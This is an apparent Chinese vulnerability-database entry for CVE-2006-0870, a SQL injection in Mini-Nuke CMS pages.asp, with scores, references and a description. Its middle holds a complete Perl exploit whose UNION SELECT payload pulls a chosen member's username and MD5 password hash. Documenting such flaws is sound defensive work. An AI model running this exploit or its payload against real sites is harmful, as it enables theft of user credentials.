CVE-2006-0870
CVSS7.5
发布时间 :2006-02-23 18:02:00
修订时间 :2008-09-05 17:00:26
NMCOE    

[原文]SQL injection vulnerability in pages.asp in Mini-Nuke CMS System 1.8.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: version 2.3 was later reported to be vulnerable as well.


[CNNVD]MiniNuke CMS Pages.ASP SQL注入漏洞(CNNVD-200602-351)

        Mini-Nuke CMS System 1.8.2及之前版本的pages.asp中存在SQL注入漏洞。远程攻击者可以借助id参数执行任意SQL命令。注意:据报道,随后的2.3版也有漏洞。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0870
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0870
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-351
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24803
(UNKNOWN)  XF  mininuke-pages-sql-injection(24803)
http://www.securityfocus.com/bid/17636
(UNKNOWN)  BID  17636
http://www.securityfocus.com/bid/16730
(UNKNOWN)  BID  16730
http://www.securityfocus.com/archive/1/archive/1/431602/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060420 Mini-NUKE v2.3<<--- SQL Injection
http://www.securityfocus.com/archive/1/archive/1/428361/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060321 Mini-Nuke<=1.8.2 SQL injection (6)
http://www.securityfocus.com/archive/1/archive/1/425599/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060220 MiniNuke CMS System all versions (pages.asp) SQL Injection
http://www.osvdb.org/23438
(UNKNOWN)  OSVDB  23438
http://www.nukedx.com/?viewdoc=9
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=9
http://secunia.com/advisories/18439
(VENDOR_ADVISORY)  SECUNIA  18439
http://www.securityfocus.com/archive/1/archive/1/431714/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060421 Re: Mini-NUKE v2.3<<--- SQL Injection

- 漏洞信息

MiniNuke CMS Pages.ASP SQL注入漏洞
高危 SQL注入
2006-02-23 00:00:00 2006-04-26 00:00:00
远程  
        Mini-Nuke CMS System 1.8.2及之前版本的pages.asp中存在SQL注入漏洞。远程攻击者可以借助id参数执行任意SQL命令。注意:据报道,随后的2.3版也有漏洞。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1514)

MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit (EDBID:1514)
asp webapps
2006-02-19 Verified
0 nukedx
N/A [点击下载]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+            Usage: mini.pl <victim> <directory> <userid>              +
+                    Example: mini.pl sux.com / 1                      +
+               Method found & Exploit scripted by nukedx              +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
	while($answer = <$mns>) {
		if ($answer =~ /([\d,a-f]{32})/) { 
			print "+ USERID: $victimid\n";
                        print "+ MD5 HASH: $1\n";
			print "+**********************************************************************+\n";
			exit(); }
		if ($answer =~ /number of columns/) { 
                print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
                print "+ So please edit query by manually adding null data..\n";
                exit(); }
	}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";

# nukedx.com [2006-02-19]

# milw0rm.com [2006-02-19]
		

- 漏洞信息

23438
Mini-NUKE pages.asp id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Mini-NUKE contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'pages.asp' script not properly sanitizing user-supplied input to the 'id' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

- 时间线

2006-02-19 Unknow
2006-02-19 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站